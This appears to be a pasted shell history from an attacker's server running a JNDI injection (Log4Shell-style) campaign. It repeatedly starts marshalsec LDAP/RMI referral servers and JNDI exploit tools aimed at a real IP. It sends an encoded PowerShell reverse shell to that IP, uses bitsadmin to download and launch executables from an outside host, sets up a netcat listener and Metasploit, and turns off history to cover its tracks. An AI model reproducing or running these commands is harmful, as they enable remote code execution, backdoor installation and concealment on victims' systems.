- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639109656
- javac Exploit.java
- #1639109684
- javac Exploit.java
- #1639109694
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639110868
- javac Exploit.java
- #1639110877
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639111179
- javac Exploit.java
- #1639111186
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639112021
- javac Exploit.java
- #1639112050
- javac Exploit.java
- #1639112424
- javac Exploit.java
- #1639112433
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639113239
- javac Exploit.java
- #1639113250
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639113978
- javac Exploit.java
- #1639114005
- javac Exploit.java
- #1639114026
- javac Exploit.java
- #1639114917
- ps
- #1639114922
- javac Exploit.java
- #1639114929
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639114938
- screen -ls
- #1639114975
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639114034
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639115006
- ps
- #1639115008
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639115039
- javac Exploit.java
- #1639115045
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639115094
- javac Exploit.java
- #1639115100
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639115139
- javac Exploit.java
- #1639115145
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639115778
- javac Exploit.java
- #1639115784
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639115914
- javac Exploit.java
- #1639115921
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639115966
- javac Exploit.java
- #1639115972
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639116138
- javac Exploit.java
- #1639116146
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639118173
- javac Exploit.java
- #1639118180
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639118318
- .javac Exploit.java
- #1639118324
- javac Exploit.java
- #1639118331
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639118744
- javac Exploit.java
- #1639118750
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639118776
- javac Exploit.java
- #1639118782
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639120934
- javac Exploit.java
- #1639120941
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639120980
- javac Exploit.java
- #1639120989
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639121150
- javac Exploit.java
- #1639121174
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639122278
- javac Exploit.java
- #1639122288
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639122356
- javac Exploit.java
- #1639122362
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639122468
- javac Exploit.java
- #1639122476
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639122531
- javac Exploit.java
- #1639122537
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639122594
- wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
- #1639122598
- ls
- #1639122611
- chmod +x JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
- #1639122648
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping cc.37021caf.dns.1433.eu.org"
- #1639123232
- javac Exploit.java
- #1639123239
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639123429
- javac Exploit.java
- #1639123436
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639123870
- javac Exploit.java
- #1639123876
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639127105
- wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
- #1639127112
- ls
- #1639127126
- unzip JNDIExploit.v1.2.zip
- #1639127130
- ls
- #1639127158
- java -jar JNDIExploit-1.2-SNAPSHOT.jar -h
- #1639127176
- java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 43.129.223.220
- #1639114915
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639143679
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639144241
- javac Exploit.java
- #1639144249
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639143577
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639144352
- javac Exploit.java
- #1639144363
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639144690
- javac Exploit.java
- #1639144696
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639144304
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639144782
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639147668
- javac Exploit.java
- #1639147780
- javac Exploit.java
- #1639148941
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639147787
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639148962
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639149024
- ls
- #1639149114
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping fff.85eeb633.dns.1433.eu.org"
- #1639149069
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping fff.85eeb633.dns.1433.eu.org"
- #1639149128
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping fff.85eeb633.dns.1433.eu.org"
- #1639145026
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639149313
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://43.129.223.220:4040/#Expl
- #1639149470
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639149578
- java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 43.129.223.220
- #1639149748
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping kk.85eeb633.dns.1433.eu.org"
- #1639149814
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping kk.85eeb633.dns.1433.eu.org" -i 43.129.223.220
- #1639149939
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping kk.85eeb633.dns.1433.eu.org" -i 43.129.223.220
- #1639149964
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Expl
- #1639148939
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639149994
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639150276
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639150338
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639150602
- javac Exploit.java
- #1639150617
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639149107
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639152181
- set +o history;
- #1639152473
- exit
- #1639152471
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639157153
- set +o history;
- #1639157216
- javac Exploit.java
- #1639157224
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://139.159.140.236:4040/#Exploit 4433
- #1639157315
- javac Exploit.java
- #1639157322
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://139.159.140.236:4040/#Exploit 4433
- #1639176216
- javac Exploit.java
- #1639176226
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://139.159.140.236:4040/#Exploit 4433
- #1639176245
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639176332
- javac Exploit.java
- #1639176339
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639176484
- javac Exploit.java
- #1639176491
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639176212
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639180723
- exit
- #1639180688
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639180897
- set +o history;
- #1639180897
- reboot
- #1639098011
- python2 -m SimpleHTTPServer 4040
- #1639246390
- set +o history;
- #1639246401
- screen
- #1639249185
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANAAzAC4AMQAyADkALgAyADIAMwAuADIAMgAwACIALAA0ADQANQAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" -A "43.129.223.220"
- #1639249463
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANAAzAC4AMQAyADkALgAyADIAMwAuADIAMgAwACIALAA0ADQANQAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiA" -A "43.129.223.220"
- #1639249477
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "c:\\windows\\Servers.exe" -A "43.129.223.220"
- #1639249661
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bitsadmin /transfer n http://back.ggbggb.com/Server.exe c:\\windows\\Server.exe" -A "43.129.223.220"
- #1639249787
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bitsadmin /transfer n http://back.ggbggb.com/Server2.exe c:\\windows\\Server2.exe" -A "43.129.223.220"
- #1639249825
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "C:\\windows\\Server2.exe" -A "43.129.223.220"
- #1639249876
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANAAzAC4AMQAyADkALgAyADIAMwAuADIAMgAwACIALAA0ADQANQAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" -A "43.129.223.220"
- #1639250025
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C " "C:\\windows\\Server2.exe" -A "43.129.223.220"
- #1639250042
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "start C:\\windows\\Server2.exe" -A "43.129.223.220"
- #1639250237
- java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANAAzAC4AMQAyADkALgAyADIAMwAuADIAMgAwACIALAA0ADQANQAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" -A "43.129.223.220"
- #1639249183
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639258969
- nc -lvp 1099
- #1639261936
- msfconsole
- #1639261940
- ls
- #1639261930
- screen
- #1639258948
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639315761
- ls
- #1639315766
- msfinstall
- #1639315768
- ll
- #1639315780
- ./msfinstall
- #1639316050
- msf
- #1639316053
- msfconsole
- #1639316085
- ./msfconsole
- #1639316121
- ll
- #1639316134
- cd /opt/metasploit-framework/bin
- #1639316136
- ls
- #1639316140
- cd msfconsole
- #1639316150
- adduser msf
- #1639316155
- su msf
- #1639318475
- exit
- #1639315761
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639318479
- exit
- #1639318478
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1639318505
- set +o history;
- #1639318539
- su msf
- #1639349991
- ls
- #1639349997
- msfconsole
- #1639350019
- vi /etc/profile
- #1639350058
- source /etc/profile
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement